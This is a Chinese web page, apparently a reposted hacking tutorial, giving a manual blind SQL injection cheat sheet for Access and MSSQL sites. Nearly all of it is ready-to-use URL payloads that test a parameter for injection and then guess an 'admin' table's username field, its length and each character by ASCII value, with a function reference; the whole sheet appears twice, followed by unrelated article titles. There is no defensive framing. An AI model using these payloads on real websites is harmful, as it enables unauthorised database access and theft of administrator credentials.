手工检测可否注入
来源:互联网 发布:xalharmtv哈萨克软件 编辑:程序博客网 时间:2024/04/27 21:17
文章作者:yjd
□ 检测可否注入
============================================================ ==================
http://url/xx?id=1111 and 1=1 (正常页面)
http://url/xx?id=1111 and 1=2 (出错页面)
============================================================ ==================
□ 检测表段的
============================================================ ==================
http://url/xx?id=1111 and exists (select * from admin)
============================================================ ==================
□ 检测字段的
============================================================ ==================
http://url/xx?id=1111 and exists (select username from admin)
============================================================ ==================
□ 检测ID
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where ID=1)
============================================================ ==================
□ 检测长度的
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)
============================================================ ==================
□ 检测长度的
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)
============================================================ ==================
□ 检测是否为MSSQL数据库
============================================================ ==================
http://url/xx?id=1111 and exists (select * from sysobjects)
============================================================ ==================
□ 检测是否为英文
============================================================ ==================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)
(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)
============================================================ ==================
□ 检测英文的范围
============================================================ ==================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)
(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)
============================================================ ==================
□ 检测那个字符
============================================================ ==================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)
(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)
============================================================ ===================
常用函数
============================================================ ===================
Access:asc(字符) SQLServer:unicode(字符)
作用:返回某字符的ASCII码
Access:chr(数字) SQLServer:nchar(数字)
作用:与asc相反,根据ASCII码返回字符
Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)
作用:返回字符串从N个字符起长度为L的子字符串,即N到N+L之间的字符串
Access:abc(数字) SQLServer:abc (数字)
作用:返回数字的绝对值(在猜解汉字的时候会用到)
Access:A between B And C SQLServer:A between B And C
作用:判断A是否界于B与C之间
□ 检测可否注入
============================================================ ==================
http://url/xx?id=1111 and 1=1 (正常页面)
http://url/xx?id=1111 and 1=2 (出错页面)
============================================================ ==================
□ 检测表段的
============================================================ ==================
http://url/xx?id=1111 and exists (select * from admin)
============================================================ ==================
□ 检测字段的
============================================================ ==================
http://url/xx?id=1111 and exists (select username from admin)
============================================================ ==================
□ 检测ID
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where ID=1)
============================================================ ==================
□ 检测长度的
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)
============================================================ ==================
□ 检测长度的
============================================================ ==================
http://url/xx?id=1111 and exists (select id from admin where len(username)=5 and ID=1)
============================================================ ==================
□ 检测是否为MSSQL数据库
============================================================ ==================
http://url/xx?id=1111 and exists (select * from sysobjects)
============================================================ ==================
□ 检测是否为英文
============================================================ ==================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)
(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)
============================================================ ==================
□ 检测英文的范围
============================================================ ==================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)
(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)
============================================================ ==================
□ 检测那个字符
============================================================ ==================
(ACCESS数据库)
http://url/xx?id=1111 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)
(MSSQL数据库)
http://url/xx?id=1111 and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1)
============================================================ ===================
常用函数
============================================================ ===================
Access:asc(字符) SQLServer:unicode(字符)
作用:返回某字符的ASCII码
Access:chr(数字) SQLServer:nchar(数字)
作用:与asc相反,根据ASCII码返回字符
Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L)
作用:返回字符串从N个字符起长度为L的子字符串,即N到N+L之间的字符串
Access:abc(数字) SQLServer:abc (数字)
作用:返回数字的绝对值(在猜解汉字的时候会用到)
Access:A between B And C SQLServer:A between B And C
作用:判断A是否界于B与C之间
- 手工检测可否注入
- SQL注入手工检测
- Cookie注入手工检测方法
- 教你手工检测SQL注入
- 手工检测jsp站注入点常用语句
- 手工注入
- 手工注入
- 手工注入
- 黑客注入之手工注入
- SQL注入(手工注入)
- 手工SQL注入教程
- JSP手工注入
- ASP+acc手工注入
- 手工注入笔记
- 手工注入摘记
- 手工SQL注入入侵
- sql手工注入
- 手工php注入总结
- 终于有自己的博客了。
- 照片调色系列教程(二):低调华丽MM
- 将动态页面转化成二进制字节流
- 请CSDN尊重开源精神-BLOG使用FCKeiditor在线编辑器竟然去掉了about项。
- 常用CASE工具介绍
- 手工检测可否注入
- C#编写ASP.NET组件...
- ASP.NET ViewState 初探
- SQL语句导入导出大全
- Virtualization technology targets Linux-powered devices
- 第二周--星期五
- vb初感
- 分页 SQLServer存储过程
- 正则表达式 匹配"<"方法!